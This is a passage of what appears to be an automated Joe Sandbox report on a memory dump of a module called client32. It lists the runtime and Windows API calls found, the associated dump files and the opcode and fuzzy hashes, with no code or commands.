                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID: psapi.dll
                                                                                        • API String ID: 1029625771-80456845
                                                                                        • Opcode ID: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                                        • Instruction ID: e72f5ce5ea606eebe772e5127c5e47cd0fc6cc19585cdbbc80c25ff44c20045f
                                                                                        • Opcode Fuzzy Hash: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                                        • Instruction Fuzzy Hash: 50E009B1A01B258FC3B0CF3AA544642BAF0BB086103118A7ED0AEC3A04F330A5448F80
                                                                                        APIs
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        • std::exception::exception.LIBCMT ref: 1108A339
                                                                                        • __CxxThrowException@8.LIBCMT ref: 1108A34E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1338273076-0
                                                                                        • Opcode ID: d1bdb1319117574830c17a134cc2d710422d6568c7d670f8424fb0812a79a6e4
                                                                                        • Instruction ID: ad670529c7b0aafe0ff7b2bbc6a3dac2c6423bd242fe34faf7ee92730ec6912a
                                                                                        • Opcode Fuzzy Hash: d1bdb1319117574830c17a134cc2d710422d6568c7d670f8424fb0812a79a6e4
                                                                                        • Instruction Fuzzy Hash: A631BF7AA04204AFC714CF68D84099BFBE9AF84314F14C15EE8598B741D7B5E945CBE0
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 110750EF
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11075159
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1654520187-0
                                                                                        • Opcode ID: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                                        • Instruction ID: 75615663fc9b5e204bff5cdf828812fccbd9a8c0715bb2e01743ee940980502e
                                                                                        • Opcode Fuzzy Hash: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                                        • Instruction Fuzzy Hash: 28219276E01268A7D710DE95EC41BEFBBBCFB44315F4041AAE90997200EB729A50CBE1
                                                                                        APIs
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        • std::exception::exception.LIBCMT ref: 110608C3
                                                                                        • __CxxThrowException@8.LIBCMT ref: 110608D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1338273076-0
                                                                                        • Opcode ID: 7a405ee56f1315c6ee1f340a3ff28517fdd231231b98c8aaa449bf634c5199d4
                                                                                        • Instruction ID: 40c1b550870c83f0c669b419c7937a1de5292af9ae005a9ffb354a33ebb971cd
                                                                                        • Opcode Fuzzy Hash: 7a405ee56f1315c6ee1f340a3ff28517fdd231231b98c8aaa449bf634c5199d4
                                                                                        • Instruction Fuzzy Hash: F11181BA900609AFC715CF99C840ADAF7F8FB58614F10863EE91997740E774E904CBE1
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _malloc_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1183979061-0
                                                                                        • Opcode ID: ccf53dde5cade46ef2409f5895fb9eeb84ec94bd13c382f69bc417f02591f7e5
                                                                                        • Instruction ID: e8b2e2ab67b960fffb59418ca6d045486158c88f9a02fc8ea8f4f968a4d4dde1
                                                                                        • Opcode Fuzzy Hash: ccf53dde5cade46ef2409f5895fb9eeb84ec94bd13c382f69bc417f02591f7e5
                                                                                        • Instruction Fuzzy Hash: A3F02879A002566F8701CF2C9844897FBDCEF4A25831480A6E849CB302D671EC15C7F0
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 110886DF
                                                                                        • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalInitializeSection_memset
                                                                                        • String ID:
                                                                                        • API String ID: 453477542-0
                                                                                        • Opcode ID: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                                        • Instruction ID: 67e0870afe33de0d146d23e59662f9f8cfec19dbcaf4764f519a7c8a3238bf1f
                                                                                        • Opcode Fuzzy Hash: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                                        • Instruction Fuzzy Hash: CC1157B1901B148FC3A4CF7A99816C3FAE5BB58354F90892E95EEC2600DB756564CF90
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
                                                                                        • ExtractIconExA.SHELL32(?,00000000,00030325,00010327,00000001), ref: 11145068
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExtractFileIconModuleName
                                                                                        • String ID:
                                                                                        • API String ID: 3911389742-0
                                                                                        • Opcode ID: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                        • Instruction ID: 51784f3a6cc6e5149e616e04a2eb2c6e0d372b09ba8f06c96ffc5d3ba3765e1d
                                                                                        • Opcode Fuzzy Hash: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                        • Instruction Fuzzy Hash: F5F0BB79A4411C5FE718DFA0CC51FF9B36AE784709F444269E956D61C4CE70594CC741
                                                                                        APIs
                                                                                          • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                                        • __lock_file.LIBCMT ref: 11164CBE
                                                                                          • Part of subcall function 1116BE59: __lock.LIBCMT ref: 1116BE7E
                                                                                        • __fclose_nolock.LIBCMT ref: 11164CC9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2800547568-0
                                                                                        • Opcode ID: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                        • Instruction ID: afac539be2367be23e5fb54bb350a7e23aa7a519b2fcc5708fa11322496ce6e3
                                                                                        • Opcode Fuzzy Hash: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                        • Instruction Fuzzy Hash: B4F0F0358017138AD7109B78CC0078EFBE96F0133CF1182088434AA6D4CBFA6521DB46
                                                                                        APIs
                                                                                        • __lock.LIBCMT ref: 11176045
                                                                                          • Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
                                                                                          • Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
                                                                                          • Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9
                                                                                        • __tzset_nolock.LIBCMT ref: 11176056
                                                                                          • Part of subcall function 1117594C: __lock.LIBCMT ref: 1117596E
                                                                                          • Part of subcall function 1117594C: ____lc_codepage_func.LIBCMT ref: 111759B5
                                                                                          • Part of subcall function 1117594C: __getenv_helper_nolock.LIBCMT ref: 111759D7
                                                                                          • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A0E
                                                                                          • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A15
                                                                                          • Part of subcall function 1117594C: __malloc_crt.LIBCMT ref: 11175A1C
                                                                                          • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A32
                                                                                          • Part of subcall function 1117594C: _strcpy_s.LIBCMT ref: 11175A40
                                                                                          • Part of subcall function 1117594C: __invoke_watson.LIBCMT ref: 11175A55
                                                                                          • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A64
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 1828324828-0
                                                                                        • Opcode ID: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                                        • Instruction ID: d808ca63efd1e9ffab5fb640758e365785c4d1c524b5d003c7d68937386cb31b
                                                                                        • Opcode Fuzzy Hash: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                                        • Instruction Fuzzy Hash: 7AE05B7E8877B3DAE7139FB4469060CF670AB05B3EF6011E5D060556C4CF701555C792
                                                                                        APIs
                                                                                          • Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                          • Part of subcall function 11164EAD: __fsopen.LIBCMT ref: 11164EBA
                                                                                        • GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                        • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                        • String ID:
                                                                                        • API String ID: 3768737497-0
                                                                                        • Opcode ID: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                                        • Instruction ID: 034c310a398a014eacf4d95463f41bd89d414178975837bd0fbb5aed6b89dd46
                                                                                        • Opcode Fuzzy Hash: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                                        • Instruction Fuzzy Hash: E8110476940319ABEB119F90CDC4A6FF3B8EF85A29F300165EC0097A00D775AD51C7A2
                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 11010B94
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LockitLockit::_std::_
                                                                                        • String ID:
                                                                                        • API String ID: 3382485803-0
                                                                                        • Opcode ID: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                                        • Instruction ID: 6fbf298b81733ad5c02794b6394837a2ddc0a350229d48e3ddb53e27456ddbdc
                                                                                        • Opcode Fuzzy Hash: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                                        • Instruction Fuzzy Hash: F1516B74A00649DFDB04CF98C980AADFBF5BF89318F248298D5469B385C776E942CB90
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
